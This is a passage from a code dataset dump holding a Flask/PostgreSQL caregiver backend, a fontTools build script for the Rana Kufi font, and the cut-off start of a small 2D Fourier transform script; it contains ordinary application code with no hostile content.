/all_caregivers request\")\n try:\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor(cursor_factory=DictCursor)\n\n # Fetch caregivers from the database\n cursor.execute(\"SELECT * FROM caregivers ORDER BY id DESC\")\n rows = cursor.fetchall()\n current_app.logger.debug(\n f\"Fetched {len(rows)} caregivers from the database\")\n\n # Close the connection\n cursor.close()\n\n if not rows:\n current_app.logger.warning(\"No caregivers found in the database\")\n return jsonify({\"error\": \"Problem of fetching caregivers\"}), 404\n\n # Directly convert the rows into JSON\n caregivers = [dict(row) for row in rows]\n\n # Format the data for JSON\n caregivers = [\n {\n \"id\": row[\"id\"],\n \"name\": row[\"name\"],\n \"years_of_experience\": row[\"years_of_experience\"],\n \"age\": row[\"age\"],\n \"education\": row[\"education\"],\n \"gender\": row[\"gender\"],\n \"phone\": row[\"phone\"],\n \"imageurl\": row[\"imageurl\"],\n \"location\": row[\"location\"],\n \"hourlycharge\": row[\"hourlycharge\"]\n }\n for row in rows\n ]\n\n current_app.logger.debug(\"Successfully processed all caregivers data\")\n\n response = make_response(jsonify(caregivers))\n response.headers['Cache-Control'] = 'no-store, no-cache, 
must-revalidate, post-check=0, pre-check=0'\n response.headers['Pragma'] = 'no-cache'\n return response\n except Exception as e:\n current_app.logger.error(\"Error fetching all caregivers\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch all caregivers\"}), 500\n \n@caregiver_bp.route(\"/all_caregivers/\", methods=[\"GET\"])\ndef get_caregiver_detail(caregiver_id):\n try:\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor(cursor_factory=DictCursor)\n\n # Fetch the specific caregiver from the database using the id\n cursor.execute(\"SELECT * FROM caregivers WHERE id = %s\",\n (caregiver_id,))\n row = cursor.fetchone()\n\n # Close the connection\n cursor.close()\n\n # Check if a caregiver with the given id exists\n if not row:\n return jsonify({\"error\": \"Caregiver not found\"}), 404\n\n # Format the data for JSON\n caregiver = {\n \"id\": row[\"id\"],\n \"name\": row[\"name\"],\n \"years_of_experience\": row[\"years_of_experience\"],\n \"age\": row[\"age\"],\n \"education\": row[\"education\"],\n \"gender\": row[\"gender\"],\n \"phone\": row[\"phone\"],\n \"imageurl\": row[\"imageurl\"],\n \"location\": row[\"location\"],\n \"hourlycharge\": row[\"hourlycharge\"]\n }\n\n return jsonify(caregiver)\n except Exception as e:\n current_app.logger.error(\n f\"Error fetching caregiver detail for id {caregiver_id}\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch caregiver detail\"}), 500\n\n\n@caregiver_bp.route(\"/all_caregivers\", methods=[\"POST\"])\ndef add_caregiver():\n try:\n data = request.get_json()\n\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor()\n\n # Define the mandatory columns and values for the INSERT query\n mandatory_columns = [\"name\", \"phone\",\n \"imageurl\", \"location\", \"hourlycharge\"]\n values = [data[field] if field != 'location' else json.dumps(\n data[field]) for field in mandatory_columns]\n\n # Optional fields: yearsOfExperience, age, education, gender\n # Add them to the INSERT query only if they are present in the data\n optional_fields = [\"years_of_experience\", \"age\", \"education\", \"gender\"]\n for field in optional_fields:\n if field in data:\n mandatory_columns.append(field)\n values.append(data[field])\n else:\n # If the optional field is missing, set a default value or NULL\n # For example, set the yearsOfExperience to NULL\n # You can customize the default values as needed\n mandatory_columns.append(field)\n values.append(None)\n\n # Construct the INSERT query with the appropriate number of placeholders\n insert_query = f\"INSERT INTO caregivers ({', '.join(mandatory_columns)}) VALUES ({', '.join(['%s'] * len(mandatory_columns))}) RETURNING id\"\n\n # Execute the INSERT query with the values\n cursor.execute(insert_query, values)\n new_caregiver_id = cursor.fetchone()[0]\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n # Return the newly created caregiver data with the assigned ID\n # imageUrl is possibly from const [imageUrl, setImageUrl] = useState(null) in CaregiverForm.tsx\n new_caregiver = {\n \"id\": new_caregiver_id,\n \"name\": data[\"name\"],\n \"phone\": data[\"phone\"],\n \"age\": data[\"age\"],\n \"education\": data[\"education\"],\n \"gender\": data[\"gender\"],\n \"years_of_experience\": data[\"years_of_experience\"],\n \"imageurl\": data[\"imageurl\"],\n \"location\": data[\"location\"],\n \"hourlycharge\": data[\"hourlycharge\"]\n }\n return jsonify(new_caregiver), 201\n\n except Exception as e:\n 
current_app.logger.error(f\"Error adding caregiver: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to add caregiver\"}), 500\n\n@caregiver_bp.route(\"/caregiver_schedule\", methods=[\"POST\"])\ndef add_caregiver_schedule():\n try:\n data = request.get_json()\n\n # Log the received data for debugging\n current_app.logger.debug(\"Received data caregiver_schedule: %s\", data)\n\n # Validate that careneeder_id is provided\n if \"caregiver_id\" not in data:\n return jsonify({\"error\": \"caregiver_id is required\"}), 400\n\n # Define the columns for the INSERT query\n columns = [\"scheduletype\", \"totalhours\", \"frequency\",\n \"startdate\", \"selectedtimeslots\", \"durationdays\", \"caregiver_id\"]\n\n # Initialize values list\n values = []\n\n # Iterate through the columns and append the values if they exist\n for column in columns:\n if column in data:\n values.append(data[column])\n else:\n values.append(None)\n\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor()\n\n # Construct the INSERT query with placeholders for all columns\n columns_placeholder = ', '.join(columns)\n values_placeholder = ', '.join(['%s'] * len(columns))\n insert_query = f\"INSERT INTO caregiverschedule ({columns_placeholder}) VALUES ({values_placeholder}) RETURNING id\"\n\n # Execute the INSERT query with the values\n cursor.execute(insert_query, values)\n new_schedule_id = cursor.fetchone()[0]\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n # Create the returned object based on the Schedule interface\n new_schedule = {\n \"id\": new_schedule_id,\n }\n\n # Include columns in the return object if they exist\n for column in columns:\n if column in data:\n new_schedule[column] = data[column]\n\n return jsonify(new_schedule), 201\n\n except Exception as e:\n if conn:\n conn.rollback()\n current_app.logger.error(\n f\"Error adding schedule: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to add schedule\"}), 500\n finally:\n if conn:\n conn.close() \n\n@caregiver_bp.route('/all_caregiverschedule', methods=['GET'])\ndef get_all_caregiverschedule():\n current_app.logger.info(\"Entering GET /all_caregiverschedule request\")\n try:\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor(cursor_factory=DictCursor)\n\n # Fetch careneederschedule data from the database\n cursor.execute(\"SELECT * FROM caregiverschedule ORDER BY id DESC\")\n rows = cursor.fetchall()\n current_app.logger.debug(\n f\"Fetched {len(rows)} caregiverschedule records from the database\")\n\n # Close the connection\n cursor.close()\n\n if not rows:\n current_app.logger.warning(\n \"No caregiverschedule records found in the database\")\n return jsonify({\"error\": \"No caregiverschedule data available\"}), 404\n\n # Format the data for JSON\n\n caregiverschedule = [dict(row) for row in rows]\n\n current_app.logger.debug(\n \"Successfully processed all caregiverschedule data\")\n\n response = make_response(jsonify(caregiverschedule))\n response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0'\n response.headers['Pragma'] = 'no-cache'\n return response\n except Exception as e:\n current_app.logger.error(\n \"Error fetching all caregiverschedule\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch all caregiverschedule\"}), 500 \n \n\n@caregiver_bp.route(\"/caregiver_ads\", methods=[\"POST\"])\ndef add_caregiver_ad():\n try:\n data = request.get_json()\n\n # Define the columns 
for the INSERT query\n        columns = [\"title\", \"description\", \"caregiver_id\"]\n\n        # Initialize values list\n        values = []\n\n        # Iterate through the columns and append the values if they exist\n        for column in columns:\n            if column in data:\n                values.append(data[column])\n            else:\n                values.append(None)\n\n        # Connect to the PostgreSQL database\n        conn = get_db()\n        cursor = conn.cursor()\n\n        # Construct the INSERT query with placeholders for all columns\n        columns_placeholder = ', '.join(columns)\n        values_placeholder = ', '.join(['%s'] * len(columns))\n        insert_query = f\"INSERT INTO caregiverads ({columns_placeholder}) VALUES ({values_placeholder}) RETURNING id\"\n\n        # Execute the INSERT query with the values\n        cursor.execute(insert_query, values)\n        new_ad_id = cursor.fetchone()[0]\n\n        # Commit the changes and close the connection\n        conn.commit()\n        cursor.close()\n\n        # Create the returned object based on the ad interface\n        new_ad = {\n            \"id\": new_ad_id,\n        }\n\n        # Include columns in the return object if they exist\n        for column in columns:\n            if column in data:\n                new_ad[column] = data[column]\n\n        return jsonify(new_ad), 201\n\n    except Exception as e:\n        if conn:\n            conn.rollback() # Rolling back in case of an error\n        current_app.logger.error(\n            f\"Error adding caregiver ad: {str(e)}\", exc_info=True)\n        return jsonify({\"error\": \"Failed to add caregiver ad\"}), 500\n    finally:\n        if conn:\n            conn.close()\n\n\n@caregiver_bp.route(\"/all_caregiverads\", methods=[\"GET\"])\ndef get_caregiver_ads():\n    try:\n        # Connect to the PostgreSQL database\n        conn = get_db()\n        # Use DictCursor to fetch rows as dictionaries\n        cursor = conn.cursor(cursor_factory=DictCursor)\n\n        # Execute the SELECT query to fetch all records from the caregiverads table\n        select_query = \"SELECT * FROM caregiverads ORDER BY id DESC\"\n        cursor.execute(select_query)\n\n        # Fetch all rows and close the cursor\n        rows = cursor.fetchall()\n        cursor.close()\n\n        current_app.logger.debug(\n            f\"Fetched {len(rows)} caregiverads records from the database\")\n\n        # Check the data type of the first row for debugging\n        if rows:\n            current_app.logger.debug(f\"First row data type: {type(rows[0])}\")\n\n        if not rows:\n            current_app.logger.warning(\n                \"No caregiverads records found in the database\")\n            return jsonify({\"error\": \"No caregiverads data available\"}), 404\n\n        caregiverads = [dict(row) for row in rows]\n\n        current_app.logger.debug(\"Successfully processed all caregiverads data\")\n\n        response = make_response(jsonify(caregiverads))\n        response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0'\n        response.headers['Pragma'] = 'no-cache'\n        return response\n\n    except Exception as e:\n        if conn:\n            conn.rollback() # Rolling back in case of an error\n        current_app.logger.error(\n            f\"Error fetching caregiver ads: {str(e)}\", exc_info=True)\n        return jsonify({\"error\": \"Failed to fetch caregiver ads\"}), 500\n\n    finally:\n        if conn:\n            conn.close() \n\n@caregiver_bp.route(\"/api/mycaregiver/<int:id>/ad\", methods=[\"PUT\"])\ndef update_caregiver_ad(id):\n    caregiver_bp.logger.debug(f\"Entering update_caregiver for id {id}\")\n    try:\n        data = request.get_json()\n\n        # Connect to the PostgreSQL database\n        conn = get_db()\n        cursor = conn.cursor()\n\n        # Define the columns and values for the UPDATE query\n        columns = [\"title\", \"description\"]\n        values = [data.get(field, None) for field in columns]\n\n        current_app.logger.debug(f\"Prepared values for SQL update: {values}\")\n\n        # Construct the UPDATE query\n        update_query = \"UPDATE 
caregiverads SET \" + \\\n ', '.join([f\"{col} = %s\" for col in columns]) + \\\n f\" WHERE caregiver_id = {id}\"\n\n # Execute the UPDATE query with the values\n cursor.execute(update_query, values)\n\n current_app.logger.info(f\"Received data: {data}\")\n current_app.logger.info(f\"Executing query: {update_query}\")\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n return jsonify({\"success\": \"更新成功\"}), 200\n\n except Exception as e:\n current_app.logger.error(\n f\"Error updating caregiver: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to update caregiver\"}), 500 ","repo_name":"chen0112/Caregiver_backend","sub_path":"caregiver.py","file_name":"caregiver.py","file_ext":"py","file_size_in_byte":17762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35731608832","text":"import argparse\nimport copy\nimport re\nimport datetime\n\nfrom fontTools.designspaceLib import DesignSpaceDocument\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.ttLib import TTFont, newTable, getTableModule\nfrom fontTools.ttLib.tables._h_e_a_d import mac_epoch_diff\nfrom fontTools.varLib import build as merge\nfrom fontTools.misc.transform import Transform\nfrom fontTools.pens.pointPen import PointToSegmentPen\nfrom fontTools.pens.reverseContourPen import ReverseContourPen\nfrom fontTools.pens.t2CharStringPen import T2CharStringPen\nfrom fontTools.pens.transformPen import TransformPen\nfrom glyphsLib import GSFont, GSGlyph, GSLayer, GSComponent, GSAnchor\nfrom glyphsLib.glyphdata import get_glyph as getGlyphInfo\nfrom cffsubr import subroutinize\n\n\nDEFAULT_TRANSFORM = [1, 0, 0, 1, 0, 0]\n\n# https://www.microsoft.com/typography/otspec/os2.htm#cpr\nCODEPAGE_RANGES = {\n 1252: 0,\n 1250: 1,\n 1251: 2,\n 1253: 3,\n 1254: 4,\n 1255: 5,\n 1256: 6,\n 1257: 7,\n 1258: 8,\n # 9-15: Reserved for Alternate ANSI\n 874: 16,\n 932: 17,\n 936: 18,\n 949: 19,\n 950: 20,\n 1361: 21,\n # 22-28: Reserved for Alternate ANSI and OEM\n # 29: Macintosh Character Set (US Roman)\n # 30: OEM Character Set\n # 31: Symbol Character Set\n # 32-47: Reserved for OEM\n 869: 48,\n 866: 49,\n 865: 50,\n 864: 51,\n 863: 52,\n 862: 53,\n 861: 54,\n 860: 55,\n 857: 56,\n 855: 57,\n 852: 58,\n 775: 59,\n 737: 60,\n 708: 61,\n 850: 62,\n 437: 63,\n}\n\n\ndef draw(layer, instance, pen=None):\n font = layer.parent.parent\n width = layer.width\n if pen is None:\n pen = T2CharStringPen(width, None)\n pen = PointToSegmentPen(pen)\n\n for path in layer.paths:\n nodes = list(path.nodes)\n\n pen.beginPath()\n if nodes:\n if not path.closed:\n node = nodes.pop(0)\n assert node.type == \"line\", \"Open path starts with off-curve points\"\n pen.addPoint(tuple(node.position), segmentType=\"move\")\n else:\n # In Glyphs.app, the starting node of a closed contour is always\n # stored at the end of the nodes list.\n nodes.insert(0, nodes.pop())\n for node in nodes:\n node_type = node.type\n if node_type not in [\"line\", \"curve\", \"qcurve\"]:\n node_type = None\n pen.addPoint(\n tuple(node.position), segmentType=node_type, smooth=node.smooth\n )\n pen.endPath()\n\n for component in layer.components:\n componentLayer = getLayer(component.component, instance)\n transform = component.transform.value\n componentPen = pen.pen\n if transform != DEFAULT_TRANSFORM:\n componentPen = TransformPen(pen.pen, transform)\n xx, xy, yx, yy = transform[:4]\n if xx * yy - xy * yx < 0:\n componentPen = ReverseContourPen(componentPen)\n 
draw(componentLayer, instance, componentPen)\n\n    return pen.pen\n\n\ndef makeKerning(font, master, glyphOrder):\n    fea = \"\"\n\n    groups = {}\n    for name in glyphOrder:\n        glyph = font.glyphs[name]\n        if not glyph.export:\n            continue\n        if glyph.leftKerningGroup:\n            group = f\"@MMK_R_{glyph.leftKerningGroup}\"\n            if group not in groups:\n                groups[group] = []\n            groups[group].append(name)\n        if glyph.rightKerningGroup:\n            group = f\"@MMK_L_{glyph.rightKerningGroup}\"\n            if group not in groups:\n                groups[group] = []\n            groups[group].append(name)\n    for group, glyphs in groups.items():\n        fea += f\"{group} = [{' '.join(glyphs)}];\\n\"\n\n    kerning = font.kerningRTL[master.id]\n    pairs = \"\"\n    classes = \"\"\n    enums = \"\"\n    for left in kerning:\n        if left in font.glyphs and not font.glyphs[left].export:\n            continue\n        for right in kerning[left]:\n            if right in font.glyphs and not font.glyphs[right].export:\n                continue\n            value = kerning[left][right]\n            kern = f\"<{value} 0 {value} 0>\"\n            if left.startswith(\"@\") and right.startswith(\"@\"):\n                if value:\n                    classes += f\"pos {left} {right} {kern};\\n\"\n            elif left.startswith(\"@\") or right.startswith(\"@\"):\n                enums += f\"enum pos {left} {right} {kern};\\n\"\n            else:\n                pairs += f\"pos {left} {right} {kern};\\n\"\n\n    fea += f\"\"\"\nlookupflag IgnoreMarks;\n{pairs}\n{enums}\n{classes}\n\"\"\"\n\n    return fea\n\n\ndef getLayer(glyph, instance):\n    for layer in glyph.layers:\n        if layer.name == instance.name:\n            return layer\n    return glyph.layers[0]\n\n\ndef makeAutoFeatures(instance, glyphOrder):\n    font = instance.parent\n\n    markClass = \"\"\n    mark = \"\"\n    curs = \"lookupflag IgnoreMarks RightToLeft;\\n\"\n    liga = \"\"\n\n    exit = {}\n    entry = {}\n    lig = {}\n\n    for gname in glyphOrder:\n        glyph = font.glyphs[gname]\n        if not glyph.export:\n            continue\n\n        layer = getLayer(glyph, instance)\n        for anchor in layer.anchors:\n            name = anchor.name\n            x = round(anchor.position.x)\n            y = round(anchor.position.y)\n            if name.startswith(\"_\"):\n                markClass += f\"markClass {gname} @mark_{name[1:]};\\n\"\n            elif name.startswith(\"caret_\"):\n                pass\n            elif \"_\" in name:\n                name, index = name.split(\"_\")\n                if gname not in lig:\n                    lig[gname] = {}\n                if index not in lig[gname]:\n                    lig[gname][index] = []\n                lig[gname][index].append((name, (x, y)))\n            elif name == \"exit\":\n                exit[gname] = (x, y)\n            elif name == \"entry\":\n                entry[gname] = (x, y)\n            else:\n                mark += f\"pos base {gname} mark @mark_{name};\\n\"\n\n    for name, components in lig.items():\n        mark += f\"pos ligature {name}\"\n        for component, anchors in components.items():\n            if component != \"1\":\n                mark += \" ligComponent\"\n            for anchor, (x, y) in anchors:\n                mark += f\" mark @mark_{anchor}\"\n        mark += \";\\n\"\n\n    for name in glyphOrder:\n        if name in exit or name in entry:\n            pos1 = entry.get(name)\n            pos2 = exit.get(name)\n            anchor1 = pos1 and f\"{pos1[0]} {pos1[1]}\" or \"NULL\"\n            anchor2 = pos2 and f\"{pos2[0]} {pos2[1]}\" or \"NULL\"\n            curs += f\"pos cursive {name} <anchor {anchor1}> <anchor {anchor2}>;\\n\"\n\n    return curs, markClass + mark\n\n\ndef makeCvFeatures(font, glyphOrder):\n    fea = \"\"\n    features = {}\n    for name in glyphOrder:\n        glyph = font.glyphs[name]\n        if name.count(\".\") >= 2:\n            base, feature, index = name.rsplit(\".\", 2)\n            try:\n                feature = int(feature)\n                index = int(index)\n            except ValueError:\n                continue\n            tag = f\"cv{feature:02d}\"\n            if tag not in features:\n                features[tag] = {}\n            if base not in features[tag]:\n                features[tag][base] = []\n            features[tag][base].append(name)\n\n    for feature, subs in features.items():\n        fea += f\"feature {feature} {{\\n\"\n        for base, alts 
in subs.items():\n fea += f\"sub {base} from [{' '.join(alts)}];\\n\"\n fea += f\"}} {feature};\\n\"\n\n return fea\n\n\nRE_DELIM = re.compile(r\"(?:/(.*?.)/)\")\n\n\ndef makeFeatures(instance, master, opts, glyphOrder):\n font = instance.parent\n\n def repl(match):\n regex = re.compile(match.group(1))\n return \" \".join(n for n in glyphOrder if regex.match(n))\n\n for x in list(font.featurePrefixes) + list(font.classes) + list(font.features):\n x.code = RE_DELIM.sub(repl, x.code)\n\n fea = \"\"\n for gclass in font.classes:\n if gclass.disabled:\n continue\n if not gclass.code and gclass.name == \"AllLetters\":\n glyphs = [n for n in glyphOrder if getGlyphInfo(n).category == \"Letter\"]\n gclass.code = \" \".join(glyphs)\n fea += f\"@{gclass.name} = [{gclass.code}];\\n\"\n\n for prefix in font.featurePrefixes:\n if prefix.disabled:\n continue\n fea += prefix.code + \"\\n\"\n\n curs, mark = makeAutoFeatures(instance, glyphOrder)\n kern = makeKerning(font, master, glyphOrder)\n cvxx = makeCvFeatures(font, glyphOrder)\n\n marker = \"# Automatic Code\"\n\n for feature in font.features:\n if feature.disabled:\n continue\n if feature.name == \"mark\":\n feature.code = feature.code.replace(marker, mark)\n if feature.name == \"curs\":\n feature.code = feature.code.replace(marker, curs)\n if feature.name == \"kern\":\n feature.code = feature.code.replace(marker, kern)\n if feature.name == \"dist\":\n fea += cvxx\n\n fea += f\"\"\"\n feature {feature.name} {{\n {feature.code}\n }} {feature.name};\n \"\"\"\n\n marks = set()\n carets = \"\"\n for name in glyphOrder:\n glyph = font.glyphs[name]\n if not glyph.export:\n continue\n\n if glyph.category and glyph.subCategory:\n if glyph.category == \"Mark\" and glyph.subCategory == \"Nonspacing\":\n marks.add(name)\n else:\n layer = getLayer(glyph, instance)\n caret = \"\"\n for anchor in layer.anchors:\n if anchor.name.startswith(\"_\"):\n marks.add(name)\n elif anchor.name.startswith(\"caret_\"):\n _, index = anchor.name.split(\"_\")\n if not caret:\n caret = f\"LigatureCaretByPos {name}\"\n caret += f\" {anchor.position.x}\"\n if caret:\n carets += f\"{caret};\\n\"\n\n fea += f\"\"\"\n@MARK = [{\" \".join(sorted(marks))}];\ntable GDEF {{\n GlyphClassDef , , @MARK, ;\n{carets}\n}} GDEF;\n\"\"\"\n\n if opts.debug:\n with open(f\"{instance.fontName}.fea\", \"w\") as f:\n f.write(fea)\n return fea\n\n\ndef calcFsSelection(instance):\n font = instance.parent\n fsSelection = 0\n if font.customParameters[\"Use Typo Metrics\"]:\n fsSelection |= 1 << 7\n if instance.isItalic:\n fsSelection |= 1 << 1\n if instance.isBold:\n fsSelection |= 1 << 5\n if not (instance.isItalic or instance.isBold):\n fsSelection |= 1 << 6\n\n return fsSelection\n\n\ndef calcBits(bits, start, end):\n b = 0\n for i in reversed(range(start, end)):\n b = b << 1\n if i in bits:\n b = b | 0x1\n return b\n\n\ndef get_property(font, key):\n for prop in font.properties:\n if key == prop.key:\n return prop.defaultValue\n return None\n\n\ndef build(instance, opts, glyphOrder):\n font = instance.parent\n master = font.masters[0]\n\n advanceWidths = {}\n characterMap = {}\n charStrings = {}\n colorLayers = {}\n for name in glyphOrder:\n glyph = font.glyphs[name]\n if not glyph.export:\n continue\n for layer in glyph.layers:\n if \"colorPalette\" in layer.attributes:\n index = layer.attributes[\"colorPalette\"]\n if name not in colorLayers:\n colorLayers[name] = []\n if layer.layerId == layer.associatedMasterId: # master layer\n colorLayers[name].append((name, int(index)))\n else:\n assert False, 
\"can’t handle non-master color layers\"\n\n if glyph.unicode:\n characterMap[int(glyph.unicode, 16)] = name\n\n layer = getLayer(glyph, instance)\n charStrings[name] = draw(layer, instance).getCharString()\n advanceWidths[name] = layer.width\n\n # XXX\n glyphOrder.pop(glyphOrder.index(\".notdef\"))\n glyphOrder.pop(glyphOrder.index(\"space\"))\n glyphOrder.insert(0, \".notdef\")\n glyphOrder.insert(1, \"space\")\n\n version = float(opts.version)\n\n vendor = get_property(font, \"vendorID\")\n names = {\n \"copyright\": font.copyright,\n \"familyName\": instance.familyName,\n \"styleName\": instance.name,\n \"uniqueFontIdentifier\": f\"{version:.03f};{vendor};{instance.fontName}\",\n \"fullName\": instance.fullName,\n \"version\": f\"Version {version:.03f}\",\n \"psName\": instance.fontName,\n \"manufacturer\": font.manufacturer,\n \"designer\": font.designer,\n \"vendorURL\": font.manufacturerURL,\n \"designerURL\": font.designerURL,\n \"licenseDescription\": get_property(font, \"licenses\"),\n \"licenseInfoURL\": get_property(font, \"licenseURL\"),\n \"sampleText\": get_property(font, \"sampleTexts\"),\n }\n\n fb = FontBuilder(font.upm, isTTF=False)\n date = font.date.replace(tzinfo=datetime.timezone.utc)\n stat = opts.glyphs.stat()\n fb.updateHead(\n fontRevision=version,\n created=int(date.timestamp()) - mac_epoch_diff,\n modified=int(stat.st_mtime) - mac_epoch_diff,\n )\n fb.setupGlyphOrder(glyphOrder)\n fb.setupCharacterMap(characterMap)\n fb.setupNameTable(names, mac=False)\n fb.setupHorizontalHeader(\n ascent=master.ascender,\n descent=master.descender,\n lineGap=master.customParameters[\"hheaLineGap\"],\n )\n\n if opts.debug:\n fb.setupCFF(names[\"psName\"], {}, charStrings, {})\n fb.font[\"CFF \"].compile(fb.font)\n else:\n fb.setupCFF2(charStrings)\n\n metrics = {}\n for name, width in advanceWidths.items():\n bounds = charStrings[name].calcBounds(None) or [0]\n metrics[name] = (width, bounds[0])\n fb.setupHorizontalMetrics(metrics)\n\n fb.setupPost(\n underlinePosition=master.customParameters[\"underlinePosition\"],\n underlineThickness=master.customParameters[\"underlineThickness\"],\n )\n\n # Compile to get font bbox\n fb.font[\"head\"].compile(fb.font)\n\n codePages = [CODEPAGE_RANGES[v] for v in font.customParameters[\"codePageRanges\"]]\n fb.setupOS2(\n version=4,\n sTypoAscender=master.ascender,\n sTypoDescender=master.descender,\n sTypoLineGap=master.customParameters[\"typoLineGap\"],\n usWinAscent=fb.font[\"head\"].yMax,\n usWinDescent=-fb.font[\"head\"].yMin,\n sxHeight=master.xHeight,\n sCapHeight=master.capHeight,\n achVendID=vendor,\n fsType=calcBits(font.customParameters[\"fsType\"], 0, 16),\n fsSelection=calcFsSelection(instance),\n ulUnicodeRange1=calcBits(font.customParameters[\"unicodeRanges\"], 0, 32),\n ulCodePageRange1=calcBits(codePages, 0, 32),\n )\n\n fea = makeFeatures(instance, master, opts, glyphOrder)\n fb.addOpenTypeFeatures(fea)\n\n palettes = master.customParameters[\"Color Palettes\"]\n palettes = [[tuple(v / 255 for v in c) for c in p] for p in palettes]\n fb.setupCPAL(palettes)\n fb.setupCOLR(colorLayers)\n\n instance.font = fb.font\n if opts.debug:\n fb.font.save(f\"{instance.fontName}.otf\")\n\n return fb.font\n\n\ndef buildVF(opts):\n font = GSFont(opts.glyphs)\n glyphOrder = buildAltGlyphs(font)\n prepare(font)\n\n for instance in font.instances:\n print(f\" MASTER {instance.name}\")\n build(instance, opts, glyphOrder)\n if instance.name == \"Regular\":\n regular = instance\n\n ds = DesignSpaceDocument()\n\n for i, axisDef in 
enumerate(font.axes):\n axis = ds.newAxisDescriptor()\n axis.tag = axisDef.axisTag\n axis.name = axisDef.name\n axis.maximum = max(x.axes[i] for x in font.instances)\n axis.minimum = min(x.axes[i] for x in font.instances)\n axis.default = regular.axes[i]\n ds.addAxis(axis)\n\n for instance in font.instances:\n source = ds.newSourceDescriptor()\n source.font = instance.font\n source.familyName = instance.familyName\n source.styleName = instance.name\n source.name = instance.fullName\n source.location = {a.name: instance.axes[i] for i, a in enumerate(ds.axes)}\n ds.addSource(source)\n\n print(f\" MERGE {font.familyName}\")\n otf, _, _ = merge(ds)\n subroutinize(otf)\n if not opts.debug:\n otf[\"post\"].formatType = 3.0\n return otf\n\n\ndef propagateAnchors(layer):\n for component in layer.components:\n clayer = component.layer or component.component.layers[0]\n propagateAnchors(clayer)\n for anchor in clayer.anchors:\n names = [a.name for a in layer.anchors]\n name = anchor.name\n if name.startswith(\"_\") or name in names:\n continue\n if name in (\"entry\", \"exit\"):\n continue\n x, y = anchor.position.x, anchor.position.y\n if component.transform != DEFAULT_TRANSFORM:\n t = Transform(*component.transform.value)\n x, y = t.transformPoint((x, y))\n new = GSAnchor(name)\n new.position.x, new.position.y = (x, y)\n layer.anchors[name] = new\n\n\ndef prepare(font):\n for glyph in font.glyphs:\n if not glyph.export:\n continue\n for layer in glyph.layers:\n propagateAnchors(layer)\n\n\ndef buildAltGlyph(glyph, alternates, componentName):\n glyphs = []\n for alternate in alternates:\n newGlyph = GSGlyph()\n name = glyph.name\n if name.endswith(\".00\"):\n newGlyph.name = name.rsplit(\".\", 1)[0]\n else:\n newGlyph.name = f\"{name}.01\"\n for attr in {\n \"category\",\n \"subCategory\",\n \"script\",\n \"leftKerningGroup\",\n \"rightKerningGroup\",\n }:\n setattr(newGlyph, attr, getattr(glyph, attr))\n\n for layer in glyph.layers:\n newLayer = GSLayer()\n for attr in {\"name\", \"width\", \"associatedMasterId\"}:\n setattr(newLayer, attr, getattr(layer, attr))\n newLayer.anchors.setter([copy.copy(a) for a in layer.anchors])\n newLayer.components.setter([copy.copy(c) for c in layer.components])\n for component in newLayer.components:\n if component.componentName == componentName:\n component.componentName = alternate\n newLayer.paths.setter([copy.copy(p) for p in layer.paths])\n newGlyph.layers.append(newLayer)\n glyphs.append(newGlyph)\n return glyphs\n\n\ndef updateKerning(font, glyph, alternates):\n for layer in glyph.layers:\n kerning = font.kerningRTL[layer.associatedMasterId]\n for component in layer.components:\n if component.componentName in alternates:\n for left in list(kerning):\n if left == component.componentName:\n assert False # XXX\n for right in list(kerning[left]):\n if right == component.componentName:\n kerning[left][glyph.name] = kerning[left][right]\n\n\ndef buildAltGlyphs(font):\n glyphOrder = [g.name for g in font.glyphs]\n newOrder = []\n alts = {}\n for name in glyphOrder:\n if name.startswith(\"-\") and not \".\" in name:\n alts[name] = [n for n in glyphOrder if n.startswith(name + \".\")]\n\n for name in glyphOrder:\n glyph = font.glyphs[name]\n if not glyph.export:\n continue\n newOrder.append(name)\n counter = 1\n for component in glyph.layers[0].components:\n if component.componentName in alts:\n alternates = alts[component.componentName]\n glyphs = buildAltGlyph(glyph, alternates, component.componentName)\n for newGlyph in glyphs:\n newGlyph.name += 
f\".{counter:02}\"\n counter += 1\n font.glyphs.append(newGlyph)\n updateKerning(font, newGlyph, alternates)\n newOrder.append(newGlyph.name)\n return newOrder\n\n\ndef main():\n from pathlib import Path\n\n parser = argparse.ArgumentParser(description=\"Build Rana Kufi.\")\n parser.add_argument(\"glyphs\", help=\"input Glyphs source file\", type=Path)\n parser.add_argument(\"version\", help=\"font version\")\n parser.add_argument(\"otf\", help=\"output OTF file\", type=Path)\n parser.add_argument(\"--debug\", help=\"Save debug files\", action=\"store_true\")\n args = parser.parse_args()\n\n otf = buildVF(args)\n otf.save(args.otf)\n\n\nmain()\n","repo_name":"aliftype/rana-kufi","sub_path":"scripts/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":20499,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"94"} +{"seq_id":"29737228835","text":"# the simple 2DFT is for the 2*2 image\n# with 4 fourier bases\n# and 4 fourier coefficients\nfrom PIL import Image, ImageDraw\nimport numpy as np \n\ndef count_energy(pixel):\n\tr = pixel.real\n\ti = pixel.imag\n\n\treturn r\n\n\ndef real_filter(pixel, coeff):\n\tresult = complex(pixel.real * coeff, pixel.imag * coeff)\n\n\treturn result\n\ndef F(u, v, float_M, float_N):\n\tresult = 0.0\n\n\tfor x in range(M):\n\t\tfor y in range(N):\n\t\t\tangle = 2 * np.pi * (u * x / float_M + v * y / float_N)\n\t\t\te_part = np.exp(-1j * angle)\n\t\t\t#e_part = 